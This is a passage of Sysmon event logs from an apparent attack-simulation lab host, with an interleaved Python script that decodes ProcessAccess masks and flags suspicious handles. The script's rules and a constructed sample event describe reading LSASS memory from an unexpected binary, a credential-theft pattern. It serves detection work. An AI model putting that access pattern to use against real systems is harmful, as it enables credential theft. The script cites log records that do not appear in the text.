CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
EventRecordID=20190; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:38.253; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AA-60D3-4A03-00000000CF01}; TargetProcessId=6868; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20189; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:38.237; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AA-60D3-4A03-00000000CF01}; TargetProcessId=6868; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20188; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:38.237; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AA-60D3-4A03-00000000CF01}; TargetProcessId=6868; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)
EventRecordID=20187; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:38.206; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=0604735443D620686D3B4D713FEFDF9B,SHA256=016756F4FB948649C80F3C6A2C9D1164C2E9B981A82CCC6ACBDCC6A50875EE82,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20186; EventID=3 (NetworkConnect); RuleName=-; UtcTime=2021-06-23 21:03:36.260; ProcessGuid={4DB9351A-9DF7-60D3-6D00-00000000CF01}; ProcessId=3888; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.14; SourceHostname=win-dc-663.attackrange.local; SourcePort=61415; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
EventRecordID=20214; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.722; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-5003-00000000CF01}; TargetProcessId=6296; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20213; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.706; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-5003-00000000CF01}; TargetProcessId=6296; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20212; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.706; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=6420; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-5003-00000000CF01}; TargetProcessId=6296; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
EventRecordID=20211; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.550; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-4F03-00000000CF01}; TargetProcessId=6968; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20210; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.534; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=432; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-4F03-00000000CF01}; TargetProcessId=6968; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventRecordID=20209; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.534; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-4F03-00000000CF01}; TargetProcessId=6968; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x103801; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)
EventRecordID=20208; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:39.253; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=A7ABAF5CABD5746C37F50BDA14F88DAD,SHA256=8230CC99E29C08C09986F358D47D2BC572D1AC9EB3044F012EF3CAD276FEBC08,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20207; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:39.206; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=81B6191918AA25422CF3F865B1D7248A,SHA256=AFA95D463B33CF6245D3F701B4917B9E6217A378E1E66833A04AB5C501D84887,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20206; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.159; SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01}; SourceProcessId=844; SourceThreadId=368; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-4E03-00000000CF01}; TargetProcessId=2440; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventRecordID=20205; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.128; SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01}; SourceProcessId=412; SourceThreadId=496; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-4E03-00000000CF01}; TargetProcessId=2440; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
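The ProcessAccess (Event ID 10) records above repeat three access masks that are worth being able to read at a glance: 0x1000 (QUERY_LIMITED_INFORMATION) from the RPCSS svchost, 0x1fffff (PROCESS_ALL_ACCESS) from csrss.exe via basesrv.dll as each new mscorsvw.exe is registered, and 0x103801 from ngen.exe controlling its compilation workers. The Python below is an added example, not code from this page or from Sysmon: it decodes GrantedAccess into named rights and applies a small triage rule to records in the shape shown here. The allowlist, the SENSITIVE_TARGETS set and the fourth sample record (an LSASS read from a user-writable path) are constructed for illustration, not observed on this host.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records by decoding GrantedAccess.

Added example, not code from this page's source or from Sysmon. The first
three SAMPLE_EVENTS mirror records 20193, 20192 and 20191 above (call traces
shortened); the fourth is a constructed suspicious record. The allowlist is an
assumption built from what this host shows, not a general policy.
"""

# Win32 process access rights (PROCESS_* constants plus the standard rights).
PROCESS_RIGHTS = {
    0x000001: "TERMINATE",
    0x000002: "CREATE_THREAD",
    0x000004: "SET_SESSIONID",
    0x000008: "VM_OPERATION",
    0x000010: "VM_READ",
    0x000020: "VM_WRITE",
    0x000040: "DUP_HANDLE",
    0x000080: "CREATE_PROCESS",
    0x000100: "SET_QUOTA",
    0x000200: "SET_INFORMATION",
    0x000400: "QUERY_INFORMATION",
    0x000800: "SUSPEND_RESUME",
    0x001000: "QUERY_LIMITED_INFORMATION",
    0x002000: "SET_LIMITED_INFORMATION",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# Rights that let the source read or change the target's memory or threads.
INTRUSIVE = {"VM_READ", "VM_WRITE", "VM_OPERATION", "CREATE_THREAD", "DUP_HANDLE"}
SENSITIVE_TARGETS = {"lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}


def decode_access(mask):
    """Name the rights set in a Sysmon GrantedAccess value ("0x1000" or an int)."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    if mask == PROCESS_ALL_ACCESS:
        return ["ALL_ACCESS"]
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)  # bits with no PROCESS_* name
    if leftover:
        names.append(f"UNNAMED_BITS(0x{leftover:x})")
    return names


def _intrusive(rights):
    return "ALL_ACCESS" in rights or bool(rights & INTRUSIVE)


def is_allowlisted(source_image, target_image):
    """True for source->target pairs that are expected on this host (assumed
    from the records above: csrss.exe opening every new process, the RPCSS
    svchost probing mscorsvw.exe, ngen.exe driving its mscorsvw.exe workers)."""
    allowlist = [
        (r"C:\Windows\system32\csrss.exe", None),
        (r"C:\Windows\system32\svchost.exe",
         r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"),
        (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe",
         r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"),
    ]
    src, dst = source_image.lower(), target_image.lower()
    return any(src == s.lower() and (d is None or dst == d.lower()) for s, d in allowlist)


def triage(event):
    """Return the reasons an Event ID 10 record deserves a look ([] if benign)."""
    rights = set(decode_access(event["GrantedAccess"]))
    src, dst = event["SourceImage"], event["TargetImage"]
    if is_allowlisted(src, dst):
        return []
    reasons = []
    target_name = dst.rsplit("\\", 1)[-1].lower()
    if target_name in SENSITIVE_TARGETS and _intrusive(rights):
        reasons.append(f"{target_name} opened with {sorted(rights)}")
    if "ALL_ACCESS" in rights:
        reasons.append("ALL_ACCESS requested by a non-allowlisted source")
    # Sysmon renders a frame outside any loaded module as UNKNOWN(<address>);
    # a handle opened from unbacked memory is a classic injected-code tell.
    if "UNKNOWN(" in event.get("CallTrace", ""):
        reasons.append("call trace contains an unbacked (UNKNOWN) frame")
    return reasons


def triage_all(events):
    """Map EventRecordID -> reasons for every record that is not benign."""
    flagged = {}
    for event in events:
        reasons = triage(event)
        if reasons:
            flagged[event["EventRecordID"]] = reasons
    return flagged


MSCORSVW = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"
SAMPLE_EVENTS = [
    {"EventRecordID": 20193, "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": MSCORSVW, "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\rpcss.dll+5126"},
    {"EventRecordID": 20192, "SourceImage": r"C:\Windows\system32\csrss.exe",
     "TargetImage": MSCORSVW, "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\CSRSRV.dll+5645"},
    {"EventRecordID": 20191, "SourceImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe",
     "TargetImage": MSCORSVW, "GrantedAccess": "0x103801",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b"},
    # Constructed: a binary in a user-writable path reading LSASS memory.
    {"EventRecordID": 999999, "SourceImage": r"C:\Users\Public\updater.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+a6134|UNKNOWN(000001D4C3A40F7E)"},
]

if __name__ == "__main__":
    for rec_id, reasons in triage_all(SAMPLE_EVENTS).items():
        print(rec_id, "->", "; ".join(reasons))
```

Running it flags only the constructed record: the three pairs copied from this host are allowlisted, which is the point of keying the rule on source/target pairs rather than on the mask alone, since 0x1fffff from csrss.exe is routine while the same mask from an unexpected image is not.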
Microsoft-Windows-Sysmon/Operational events from win-dc-663.attackrange.local, continued, one record per line with fields labeled per the Sysmon event schema. Every record carries Level=4, Opcode=0 and Keywords=0x8000000000000000; Version=5 for EventID 3 and 23, Version=3 for EventID 10, Version=2 for EventID 11. The SourceProcessId/SourceThreadId split in ProcessAccess records is inferred from the values repeating across records.

EventRecordID=20204; EventID=10 (ProcessAccess); RuleName=-; UtcTime=2021-06-23 21:03:39.128; SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01}; SourceProcessId=5388; SourceThreadId=5396; SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe; TargetProcessGUID={4DB9351A-A1AB-60D3-4E03-00000000CF01}; TargetProcessId=2440; TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)
EventRecordID=20203; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:39.081; ProcessGuid={4DB9351A-9DEA-60D3-3000-00000000CF01}; ProcessId=2404; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml; Hashes=MD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20216; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:40.659; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=56EABB00BC89659B10F2E8B89F4E6353,SHA256=FC0DC4A4295E17EB2E19EDAEB1C31A6E88F3E20E45AEE88BF70C362C5802AD9A,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
EventRecordID=20215; EventID=23 (FileDelete); RuleName=-; UtcTime=2021-06-23 21:03:40.221; ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01}; ProcessId=3068; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=F893C8F285CD37806864A58BFBE3C05D,SHA256=FDD2E112C2DA49D880AF7C071832D4C14F8F2185CCD31600B8F5B4F5AC70A864,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=true
